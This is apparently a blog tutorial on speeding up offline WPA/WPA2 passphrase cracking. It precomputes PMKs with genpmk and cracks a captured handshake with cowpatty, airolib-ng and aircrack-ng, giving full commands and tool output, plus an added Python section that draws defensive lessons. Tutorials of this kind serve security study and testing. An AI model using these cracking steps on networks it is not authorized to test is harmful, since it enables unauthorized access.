
4) Accelerating Wifi WPA/WPA2 password cracking

category Wifi 2016. 3. 6. 22:28

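Cracking can be accelerated by computing the pre-shared key (PMK) in advance.
Computing the PMK also requires the SSID, so even an identical passphrase produces a different PMK when the SSID is different.
In other words, the PMK depends on both the passphrase and the SSID.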
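
The dependence on the SSID described above can be checked directly. The following is an added example, not part of the original post: it derives the PMK with the standard WPA-PSK mapping (PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations, 32 bytes) and shows that a table built for one SSID finds nothing for another SSID or for a passphrase missing from the wordlist. The names wpa_pmk, build_table, lookup and WORDLIST are assumptions, and the direct PMK comparison stands in for the handshake MIC check that real tools perform.

```python
import hashlib

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def build_table(wordlist, ssid):
    """Precompute {PMK: passphrase} for ONE SSID; words of invalid length are skipped."""
    table = {}
    for word in wordlist:
        if 8 <= len(word) <= 63:
            table[wpa_pmk(word, ssid)] = word
    return table

def lookup(table, pmk):
    """Return the passphrase whose precomputed PMK matches, or None."""
    return table.get(pmk)

# Constructed sample wordlist ("short" is under 8 characters and gets skipped).
WORDLIST = ["12345678", "password", "short", "letmein123"]

def demo():
    table = build_table(WORDLIST, "Wifitest")
    return {
        # Same SSID, passphrase in the wordlist: the table hits.
        "same_ssid": lookup(table, wpa_pmk("12345678", "Wifitest")),
        # Same passphrase, different SSID: the salt changed, so the table misses.
        "other_ssid": lookup(table, wpa_pmk("12345678", "Wifitest-5G")),
        # Passphrase not in the wordlist: nothing to find, whatever the speed.
        "unlisted": lookup(table, wpa_pmk("x9!Tq-long-unlisted-phrase", "Wifitest")),
    }

if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case}: {result}")
```

For a defender this means a precomputed table is only worth anything against the exact SSID it was built for and against passphrases that appear in public wordlists, so a non-default SSID and a long passphrase outside those lists remove the speed-up.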

The genpmk tool precomputes the PMKs for a specific SSID and wordlist.
Generate the PMK file in advance with genpmk and darkc0de.lst. (This takes quite a long time.)

root@bt:~# genpmk -f /pentest/passwords/wordlists/darkc0de.lst  -d PMK-Wifitest -s "Wifitest"
genpmk 1.1 - WPA-PSK precomputation attack.
File PMK-Wireless-Lab exists, appending new data.
key no. 1000: 012ih0n
key no. 2000: 070mi714n
key no. 3000: 0d0n746124
key no. 4000: 0pini0n47iv3n355
key no. 5000: 0v31212i07
key no. 6000: 0v312bu9
key no. 7000: 0vi6312m
key no. 8000: 1 ARSENIAN
key no. 9000: 1 BEVERLE
key no. 10000: 1 BUDROS
key no. 11000: 1 CIAGLO
key no. 12000: 1 DELLER
key no. 13000: 1 ELSBERND
key no. 14000: 1 FUMAGALLI
key no. 15000: 1 GROENSTEIN
key no. 16000: 1 HESSELGREN
key no. 17000: 1 JONATHON
key no. 18000: 1 KOJNOK
key no. 19000: 1 LESKAR
key no. 20000: 1 MARIJKE
key no. 21000: 1 MISSIMER
key no. 22000: 1 NOGALES
key no. 23000: 1 PETCHY
key no. 24000: 1 RAUMAKER
key no. 25000: 1 SALMONSON
key no. 26000: 1 SHAOLA
key no. 27000: 1 STERZINGER
key no. 28000: 1 TILAKAKAVATHY
key no. 29000: 1 VOGELSBERG
key no. 30000: 1 ZAHRAH
key no. 31000: 1066in6


1.cowpatty

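Use cowpatty to crack with the PMK file generated by genpmk.
Cracking against a pre-generated PMK file finishes very quickly, but a password that was not in the wordlist when the PMK file was built will not be cracked.
The output below shows a failed crack.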

root@bt:~# cowpatty -d PMK-Wifitest -s "Wifitest" -r wpa-01.cap
cowpatty 4.6 - WPA-PSK dictionary attack. 
 
Collected all necessary data to mount crack against WPA/PSK passphrase.
Starting dictionary attack.  Please be patient.
key no. 10000: N3OeV9vcYF8nPRIDnk
key no. 20000: 1 BERMINGHAM
key no. 30000: 1 LEERUANGSRI
key no. 40000: 1 VIERNES
key no. 50000: 124chi70m9
key no. 60000: 177ind312m057
key no. 70000: 3 BADILLO
key no. 80000: 3xpui7i0n
key no. 90000: 4min04c370ph3n37idin3
key no. 100000: 53mi1235p3c74bi1i79
key no. 110000: 5hik412i
key no. 120000: 6120in3129
key no. 130000: 73130ph0123
key no. 140000: Aendenboom
key no. 150000: Barwikowski
key no. 160000: COOPRIDER
key no. 170000: Cyberpreppie
key no. 180000: Energy&Automation
key no. 190000: Giachino
key no. 200000: Hsiang-Hsin
key no. 210000: Kelliher
key no. 220000: M411in6
key no. 230000: Mnestheus
fread: Success
Unable to identify the PSK from the dictionary file. Try expanding your
passphrase list, and double-check the SSID.  Sorry it didn't work out.
 
239850 passphrases tested in 1.88 seconds:  127844.79 passphrases/second

This is the output of a successful crack.

root@bt:~# cowpatty -d PMK-Wifitest5 -s "Wifitest" -r wpa-01.ca
cowpatty 4.6 - WPA-PSK dictionary attack. 
 
Collected all necessary data to mount crack against WPA/PSK passphrase.
Starting dictionary attack.  Please be patient.
 
The PSK is "12345678".
 
5 passphrases tested in 0.00 seconds:  70422.53 passphrases/second

2.airolib-ng

Convert the PMK file with airolib-ng and crack it with aircrack-ng.

root@bt:~# airolib-ng PMK-Aircrack --import cowpatty PMK-Wifitest
Database  does not already exist, creating it...
Database  successfully created
Reading header...
Reading...
Updating references...
Writing...
root@bt:~# aircrack-ng -r PMK-Aircrack wpa-01.cap
Opening wpa-01.cap
Read 4167 packets.
 
   #  BSSID              ESSID                     Encryption
 
   1  00:08:9F:64:DD:3C  Wifitest              WPA (1 handshake)
 
Choosing first network as target.
 
Opening wpa-01.cap
Reading packets, please wait...
 
                                 Aircrack-ng 1.1 r2178
 
 
                   [00:00:02] 231364 keys tested (90728.21 k/s)
 
 
                       Current passphrase: N B Nelson                
 
 
      Master Key     : 5B AA CC B4 BF DC 7B C3 46 39 63 24 1B 22 2A F1
                       D1 96 CB 9C 12 DA 7E 5F 4A CE 2E 3F AD DA A3 B9
 
      Transient Key  : 25 46 A3 59 BF F4 C4 F4 13 3C 33 AA 1C A6 C0 C9
                       C3 35 62 68 7C 3A A2 90 B7 07 3F ED 34 6F 99 8F
                       80 9C B6 64 2D 4E F5 E8 2A FF B9 E9 FE 75 AC A9
                       CD A5 F7 DD 81 CF 0C A3 24 4A 8F A6 29 8D B8 BE
 
      EAPOL HMAC     : 4C F9 AA AD 48 50 5B 78 E5 73 46 90 4B 76 16 F7
 
 
Quitting aircrack-ng...


